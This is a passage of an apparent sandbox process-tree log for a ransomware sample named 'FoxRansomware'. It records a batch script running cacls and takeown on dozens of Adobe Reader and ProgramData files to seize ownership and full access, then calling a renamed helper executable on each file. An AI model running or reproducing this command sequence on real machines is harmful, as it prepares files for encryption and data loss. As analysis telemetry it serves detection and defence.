  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:4420
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:5496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    - Modifies file permissions
    PID:5512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:2900
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:5464
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5468
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
  2⤵
  PID:5456
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:5404
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:700
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:668
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5520
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""
  2⤵
  PID:5944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C
    3⤵
    PID:2688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"
    3⤵
    PID:5144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "eula.ini" -nobanner
    3⤵
    PID:5156
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "eula.ini" -nobanner
      4⤵
      PID:5184
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5140
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""
  2⤵
  PID:5204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C
    3⤵
    PID:2620
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"
    3⤵
    - Modifies file permissions
    PID:2356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "AcroSign.prc" -nobanner
    3⤵
    PID:2628
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "AcroSign.prc" -nobanner
      4⤵
      PID:1524
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5212
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""
  2⤵
  PID:2508
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"
    3⤵
    PID:2296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "forms_distributed.gif" -nobanner
    3⤵
    PID:3212
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "forms_distributed.gif" -nobanner
      4⤵
      PID:2016
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5152
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""
  2⤵
  PID:336
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C
    3⤵
    PID:3064
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "reviews_sent.gif" -nobanner
    3⤵
    PID:1876
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "reviews_sent.gif" -nobanner
      4⤵
      PID:292
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""
  2⤵
  PID:2716
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"
    3⤵
    PID:2204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "stop_collection_data.gif" -nobanner
    3⤵
    PID:796
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "stop_collection_data.gif" -nobanner
      4⤵
      PID:976
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2896
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""
  2⤵
  PID:1892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"
    3⤵
    PID:1096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ReadMe.htm" -nobanner
    3⤵
    PID:2784
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "ReadMe.htm" -nobanner
      4⤵
      PID:2940
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""
  2⤵
  PID:2100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"
    3⤵
    PID:2440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MinionPro-It.otf" -nobanner
    3⤵
    PID:2444
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "MinionPro-It.otf" -nobanner
      4⤵
      PID:1456
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3020
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""
  2⤵
  PID:3988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C
    3⤵
    PID:936
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ZX______.PFB" -nobanner
    3⤵
    PID:2588
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "ZX______.PFB" -nobanner
      4⤵
      PID:1308
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""
  2⤵
  PID:3392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C
    3⤵
    PID:3364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"
    3⤵
    PID:3256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "brt04.hsp" -nobanner
    3⤵
    PID:3200
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "brt04.hsp" -nobanner
      4⤵
      PID:1672
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""
  2⤵
  PID:3264
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C
    3⤵
    PID:4012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"
    3⤵
    PID:4308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "engphon.env" -nobanner
    3⤵
    PID:2916
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "engphon.env" -nobanner
      4⤵
      PID:3512
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""
  2⤵
  PID:4356
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"
    3⤵
    PID:3128
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CORPCHAR.TXT" -nobanner
    3⤵
    PID:3096
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "CORPCHAR.TXT" -nobanner
      4⤵
      PID:3448
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2396
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""
  2⤵
  PID:960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C
    3⤵
    PID:3104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CP1250.TXT" -nobanner
    3⤵
    PID:3004
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "CP1250.TXT" -nobanner
      4⤵
      PID:3144
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5672
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C
    3⤵
    PID:656
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"
    3⤵
    PID:3152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "AGMGPUOptIn.ini" -nobanner
    3⤵
    PID:2640
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "AGMGPUOptIn.ini" -nobanner
      4⤵
      PID:2160
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""
  2⤵
  PID:3388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C
    3⤵
    PID:4044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"
    3⤵
    PID:3660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MyriadCAD.otf" -nobanner
    3⤵
    PID:1956
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "MyriadCAD.otf" -nobanner
      4⤵
      PID:4424
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3508
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""
  2⤵
  PID:4040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C
    3⤵
    PID:4696
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"
    3⤵
    PID:4020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "create_form.gif" -nobanner
    3⤵
    PID:4624
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "create_form.gif" -nobanner
      4⤵
      PID:4720
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5548
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""
  2⤵
  PID:4580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C
    3⤵
    PID:3352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"
    3⤵
    - Modifies file permissions
    PID:4504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "info.gif" -nobanner
    3⤵
    PID:4448
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "info.gif" -nobanner
      4⤵
      PID:5776
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5600
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""
  2⤵
  PID:5740
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"
    3⤵
    PID:5552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "review_same_reviewers.gif" -nobanner
    3⤵
    PID:2584
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "review_same_reviewers.gif" -nobanner
      4⤵
      PID:3752
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5624
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""
  2⤵
  PID:3100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"
    3⤵
    PID:5620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "trash.gif" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "trash.gif" -nobanner
      4⤵
      PID:4440
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""
  2⤵
  PID:3244
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:3892
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"
    3⤵
    PID:3852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CourierStd-Bold.otf" -nobanner
    3⤵
    PID:4516
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "CourierStd-Bold.otf" -nobanner
      4⤵
      PID:3796
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4160
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""
  2⤵
  PID:3248
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:5232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"
    3⤵
    PID:3812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MyriadPro-It.otf" -nobanner
    3⤵
    PID:2708
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "MyriadPro-It.otf" -nobanner
      4⤵
      PID:2092
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""
  2⤵
  PID:3832
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C
    3⤵
    PID:5792
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"
    3⤵
    PID:5720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
    3⤵
    PID:5668
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
      4⤵
      PID:3800
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""
  2⤵
  PID:5848
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C
    3⤵
    PID:4100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"
    3⤵
    - Modifies file permissions
    PID:5816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "can.hyp" -nobanner
    3⤵
    PID:5724
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "can.hyp" -nobanner
      4⤵
      PID:5696
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3308
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""
  2⤵
  PID:4224
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C
    3⤵
    PID:5956
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"
    3⤵
    - Modifies file permissions
    PID:5988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "usa37.hyp" -nobanner
    3⤵
    PID:4196
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "usa37.hyp" -nobanner
      4⤵
      PID:5636
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4188
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""
  2⤵
  PID:4260
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C
    3⤵
    PID:4220
